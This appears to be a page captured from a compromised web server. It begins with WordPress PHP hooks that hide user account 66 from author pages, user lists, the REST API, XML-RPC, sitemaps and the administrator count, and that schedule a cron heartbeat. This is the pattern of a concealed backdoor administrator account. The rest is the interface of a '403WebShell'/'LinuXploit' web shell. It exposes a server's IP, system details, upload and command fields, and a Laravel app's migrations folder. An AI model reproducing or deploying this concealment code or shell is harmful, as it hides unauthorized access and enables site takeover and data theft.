add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/emajiwallet/database/migrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
April 14 2026 07:47:20
deploy / www-data
0755
2014_10_12_100000_create_password_resets_table.php
0.667 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_10_145946_create_wallets_table.php
0.791 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_13_175648_create_sessions_table.php
0.769 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_13_180227_create_cache_table.php
0.829 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_16_074304_create_professions_table.php
0.669 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_16_074304_create_qualifications_table.php
0.645 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_16_074306_create_employers_table.php
0.698 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_16_074306_create_jobs_table.php
0.878 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_16_074307_create_profession_qualification_table.php
0.643 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_16_074308_create_job_qualification_table.php
0.611 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_17_071616_create_wallet_qualification_table.php
0.619 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_20_061347_create_qualification_providers_table.php
0.667 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_20_061427_create_provider_qualification_table.php
0.908 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_20_132830_change_qualification_uuid_to_integer_in_provider_qualification_table.php
0.872 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_07_20_160817_create_countries_table.php
0.623 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_08_050126_create_profession_qualification_requirements_table.php
1.375 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_10_111314_create_credential_mappings_table.php
1.452 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_10_111711_create_issuers_table.php
1.57 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_10_112547_create_wallet_credentials_table.php
0.982 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_10_114146_add_uuid_to_wallets_table.php
0.511 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_10_132934_create_wallet_credentials_table.php
0.579 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_10_173936_add_issuer_identifier_to_issuers_table.php
0.521 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_10_173937_add_achievment_it_to_table_wallet_credendials.php
0.573 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_10_173939_change_achievement_id_wallet_credendials.php
0.578 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_11_074006_add_decoded_json_to_wallet_credentials_table.php
0.572 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_11_092353_2026_08_11_112300_add_is_core_to_job_qualification_table.php
0.577 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_11_1111_add_image_fields_to_wallet_credentials_table.php
0.648 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_11_214557_create_users_table.php
0.635 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_11_220036_add_uuid_to_wallet_credentials_table.php
1.291 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_18_173609_create_organizations_table.php
0.71 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_18_173632_create_organization_kinds_table.php
0.816 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_18_173651_create_organization_user_table.php
0.839 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_18_173718_add_org_and_uuid_to_jobs_table.php
1.298 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_21_124103_add_external_refs_to_qualifications_table.php
1.552 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_22_045346_create_languages_table.php
0.559 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_22_045433_create_job_language_requirements_table.php
0.968 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_22_183216_add_external_url_to_jobs_table.php
0.624 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_050359_add_created_by_to_jobs_table.php
0.671 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_060410_create_job_qualifications_table.php
0.999 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_082037_split_location_into_city_and_country_in_jobs_table.php
0.805 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_082206_add_city_country_and_user_to_jobs_table.php
0.729 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_082549_remove_employer_id_from_jobs_table.php
0.766 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_083308_alter_jobs_title_nullable.php
0.473 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_085823_add_status_to_jobs_table.php
0.523 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_135125_add_user_id_to_wallets_table.php
0.835 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_23_182514_add_description_to_organizations_table.php
0.57 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_26_040532_create_user_identifiers_table.php
0.791 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_27_184914_create_pathways_table.php
1.059 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_27_185022_create_pathway_requirements_table.php
1.377 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_08_27_185135_create_wallet_languages_table.php
0.764 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_02_050101_add_recognition_fields_to_professions_table.php
0.968 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_02_050114_add_recognition_fields_to_qualifications_table.php
0.87 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_02_050119_create_recognition_rules_table.php
0.93 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_02_050142_create_profession_language_requirements_table.php
0.793 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_02_051817_create_country_language_table.php
0.727 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_02_052132_add_local_language_required_to_professions_table.php
0.603 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_03_184106_add_privacy_accepted_at_to_users_table.php
0.538 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_03_185343_ping_method_to_users_table.php
0.547 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_04_143720_create_user_credentials_table.php
1.32 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_04_143725_create_user_qualifications_table.php
0.666 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_04_143731_create_user_languages_table.php
0.668 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_04_143736_update_pathways_table_replace_wallet_with_user.php
0.937 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_04_143741_drop_wallet_tables.php
0.378 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_04_183018_add_type_to_qualifications_table.php
0.604 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_07_163738_add_local_image_fields_to_user_credentials_table.php
0.693 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_07_181753_add_credential_uuid_to_user_credentials_table.php
0.481 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_08_192442_create_job_qualification_requirement_table.php
0.804 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_09_044622_add_status_to_qualification_providers_table.php
0.598 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_09_27_150651_add_thumbnail_and_vc_location_to_user_credentials_table.php
0.676 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_19_152708_newtabletrainings.php
1.073 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_19_152922_new_table_training_instances.php
0.918 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_20_064000_drop_job_language_requirements_table.php
0.566 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_20_064634_drop_profession_language_requirements_table.php
0.587 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_20_070003_add_uuid_to_languages_table.php
0.682 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_20_072939_update_languages_table.php
0.572 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_20_073401_update_languages_table.php
1.19 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_22_091407_add_description_to_languages_table.php
0.608 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_22_092719_migrate_qualification_providers_to_organizations.php
3.572 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_22_092923_drop_qualification_providers_table.php
0.506 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_22_161235_make_password_nullable_in_users_table.php
0.614 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_23_084525_add_encryption_master_key_to_users_table.php
0.624 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_23_103018_fix_user_identifiers_table_add_is_primary.php
1.276 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_24_072356_add_recipient_identifier_to_user_credentials_table.php
0.654 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_24_102130_modify_user_identifiers_unique_constraint_for_verification.php
1.779 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_24_102418_add_recipient_verified_status_to_user_credentials.php
0.956 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_24_103105_create_identifier_verification_tokens_table.php
0.955 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_25_054727_create_credential_notifications_table.php
1.57 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_25_134500_drop_user_languages_table.php
0.676 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_25_135000_remove_provider_link_from_qualifications.php
1.32 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_27_090750_add_elm_fields_to_user_credentials_table.php
1.057 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_27_184655_rename_password_resets_to_password_reset_tokens.php
0.972 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_11_28_215341_create_shares_table.php
1.61 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_12_12_084721_add_missing_fields_to_users_table.php
2.074 KB
April 14 2026 07:47:20
deploy / www-data
0775
2025_12_27_155614_create_webauthn_credentials.php
0.286 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_01_02_175502_add_credentialability_and_informal_fields.php
2.509 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_01_02_190729_make_profession_id_nullable_on_jobs_table.php
0.959 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_01_04_174318_add_summative_qualification_to_professions_table.php
0.896 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_01_05_101507_add_cefr_level_to_credential_mappings_table.php
0.633 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_01_06_100353_create_webauthn_credentials.php
0.286 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_01_06_105356_update_profession_requirements_notes_to_summative_qualification.php
1.876 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_01_09_131837_increase_recipient_identifier_column_size.php
2.654 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_02_10_100000_add_informal_to_job_qualifications_table.php
1.055 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_04_04_041156_create_osp_pathways_table.php
1.412 KB
April 14 2026 07:47:20
deploy / www-data
0775
2026_04_04_060344_change_osp_id_to_uuid_in_osp_pathways.php
0.956 KB
April 14 2026 07:47:20
deploy / www-data
0775

Youez - 2016 - github.com/yon3zu
LinuXploit